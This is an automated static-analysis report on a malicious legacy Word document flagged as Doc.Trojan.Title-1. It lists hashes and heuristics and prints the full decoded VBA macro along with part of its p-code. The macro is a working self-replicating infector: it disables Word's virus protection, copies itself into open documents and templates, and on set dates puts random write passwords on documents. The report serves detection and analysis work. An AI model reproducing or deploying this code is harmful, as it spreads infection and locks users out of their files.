Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f08f034df2201fc8…

MALICIOUS

Office (OLE)

Size: 37.5 KB
Created: 2000-09-30 15:48:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: a2049953866732caaa2af9639e986d55
SHA-1: 1d153f734636187b00b9e526b1bfde9526f2a20b
SHA-256: f08f034df2201fc883dd496195c2ae1266d4ee8e1b69b94525350f55f0d57052
Risk Score: 180

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment

The sample contains VBA macros that appear to be designed to copy themselves to other documents. The ClamAV detection 'Doc.Trojan.Title-1' and the OLE slack anomaly further indicate malicious intent. The VBA code attempts to inject itself into other documents, suggesting a mechanism for spreading or maintaining persistence.

Heuristics (3)

  • ClamAV: Doc.Trojan.Title-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Title-1
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 38,400 bytes but its declared streams total only 19,137 bytes — 19,263 bytes (50%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 9208 bytes
SHA-256: 666045d9f2e4e828cf33576c89cedc6aed5417df0f8f16359b414851a70dfec2
Detection
ClamAV: Doc.Trojan.Title-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
On Error Resume Next
    If Left(Me.BuiltInDocumentProperties("Title"), 1) = "?" Then
        Me.BuiltInDocumentProperties("Title") = Mid(Me.BuiltInDocumentProperties("Title"), 2)
        Exit Sub
    End If
    Me.BuiltInDocumentProperties("Title") = "?" & Me.BuiltInDocumentProperties("Title")
    Dim currdoc As Document
    Dim thecode As Object
    Dim currcomp As Object
    Set thecode = Me.VBProject.VBComponents.Item(Me.CodeName).CodeModule
    Dim lines As Integer, mystart As Integer
    mystart = thecode.ProcBodyLine("Document_Close", vbext_pk_Proc)
    mylines = thecode.ProcCountLines("Document_Close", vbext_pk_Proc) - mystart + 1
    Dim savy As Boolean
    Options.VirusProtection = False
    For Each currdoc In Documents
        savy = currdoc.Saved
        If currdoc.SaveFormat = wdFormatDocument Or currdoc.SaveFormat = wdFormatTemplate Then
            Set currcomp = currdoc.VBProject.VBComponents.Item(1)
            If Not currcomp.CodeModule.Find("wsxzaqedc", 1, 1, 100000, 100000) Then
                If Not currcomp.CodeModule.Find("Document_Close", 1, 1, 100000, 100000) Then
                    currcomp.CodeModule.AddFromString thecode.lines(mystart, mylines)
                Else
                    currcomp.CodeModule.InsertLines currcomp.CodeModule.ProcBodyLine("Document_Close", vbext_pk_Proc) + 1, thecode.lines(mystart + 1, mylines - 2)
                End If
                If savy Then currdoc.Save
            End If
            If (Day(Now()) = 30 And Month(Now()) = 7) Or (Day(Now()) = 20 And Month(Now()) = 6) Or (Day(Now()) = 3 And Month(Now()) = 5) Then
                currdoc.WritePassword = Str(Int(Rnd() * 10) - 1)
                If savy Then currdoc.Save
            End If

        End If
    Next currdoc
    Dim currtemp As Template
    Dim code As String
    For Each currtemp In Templates
        savy = currtemp.Saved
        Set currcomp = currtemp.VBProject.VBComponents.Item(1)
        If Not currcomp.CodeModule.Find("wsxzaqedc", 1, 1, 100000, 100000) Then
            If Not currcomp.CodeModule.Find("Document_Close", 1, 1, 100000, 100000) Then
                code = thecode.lines(mystart, mylines)
                currcomp.CodeModule.AddFromString code
            Else
                code = thecode.lines(mystart + 1, mylines - 2)
                currcomp.CodeModule.InsertLines currcomp.CodeModule.ProcBodyLine("Document_Close", vbext_pk_Proc) + 1, code
            End If
            If savy Then currtemp.Save
         End If
    Next currtemp
    Me.BuiltInDocumentProperties("Title") = Mid(Me.BuiltInDocumentProperties("Title"), 2)
End Sub

' Processing file: /opt/analyzer/scan_staging/a772df3b5bd74226a14dc672b6529c0e.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 4261 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Close())
' Line #1:
' 	OnError (Resume Next) 
' Line #2:
' 	LitStr 0x0005 "Title"
' 	Ld id_FFFF 
' 	ArgsMemLd BuiltInDocumentProperties 0x0001 
' 	LitDI2 0x0001 
' 	ArgsLd LBound 0x0002 
' 	LitStr 0x0001 "?"
' 	Eq 
' 	IfBlock 
' Line #3:
' 	LitStr 0x0005 "Title"
' 	Ld id_FFFF 
' 	ArgsMemLd BuiltInDocumentProperties 0x0001 
' 	LitDI2 0x0002 
' 	ArgsLd Mid$ 0x0002 
' 	LitStr 0x0005 "Title"
' 	Ld id_FFFF 
' 	ArgsMemSt BuiltInDocumentProperties 0x0001 
' Line #4:
' 	ExitSub 
' Line #5:
' 	EndIfBlock 
' Line #6:
' 	LitStr 0x0001 "?"
' 	LitStr 0x0005 "Title"
' 	Ld id_FFFF 
' 	ArgsMemLd BuiltInDocumentProperties 0x0001 
' 	Concat 
' 	LitStr 0x0005 "Title"
' 	Ld id_FFFF 
' 	ArgsMemSt BuiltInDocumentProperties 0x0001 
' Line #7:
' 	Dim 
' 	VarDefn currdoc (As Document)
' Line #8:
' 	Dim 
' 	VarDefn thecode (As Object)
' Line #9:
' 	Dim 
' 	VarDefn currcomp (As Object)
' Line #10:
... (truncated)